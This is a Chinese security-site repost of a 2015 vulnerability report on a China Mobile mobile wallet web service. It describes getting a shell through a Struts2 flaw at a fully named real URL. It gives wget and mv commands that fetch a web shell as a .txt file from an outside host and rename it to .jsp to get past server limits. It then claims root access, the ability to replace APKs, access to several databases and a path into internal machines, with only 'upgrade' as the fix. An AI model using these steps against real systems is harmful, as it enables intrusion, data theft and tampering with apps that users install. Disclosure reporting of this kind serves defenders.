网站地图    收藏   

子栏目

主页 > 入门引导 > 黑客攻防 >

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) - 网站安全 - 自学php网

来源:未知    时间:2015-04-15 13:14 作者:xxadmin 阅读:

[导读] struts2 漏洞 地址:http://wxhd.shwxcs.cn/PhotoflyingCity/AppActivityNfc/index.action?urlcategory=1appid=AP310000000000010634areacode=310000portaltype=0columnid=accesstype=1ext=version=3usessionid=ua=resourceid=SV310000000333backurl= 服务...

 

struts2漏洞

地址:http://wxhd.shwxcs.cn/PhotoflyingCity/AppActivityNfc/index.action?urlcategory=1&appid=AP310000000000010634&areacode=310000&portaltype=0&columnid=&accesstype=1&ext=&version=3&usessionid=&ua=&resourceid=SV310000000333&backurl=

服务器有限制,wget无法直接下载shell,小技巧绕过

先下载txt格式然后vm命令改成jsp

wget -P 绝对路径 http://www.xxx.com/shell.txt

mv 绝对路径/shell.txt 绝对路径/shell.jsp

root权限
 

1.png


 

root.png



可替换apk应用
 

QQ截图20150123092415.png



涉及多个数据库
 

2.png


 

3.png


 

4.png


 

5.png


 

6.png


 

7.png


 

8.png


 

9.png


 

10.png


 

11.png


 

12.png



多个业务备份
 

QQ截图20150125134800.png



多个内网机器,可继续渗透
 

QQ截图20150123125915.png


 

QQ截图20150123125939.png


 

QQ截图20150123130011.png

 

 

解决方案:

升级

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论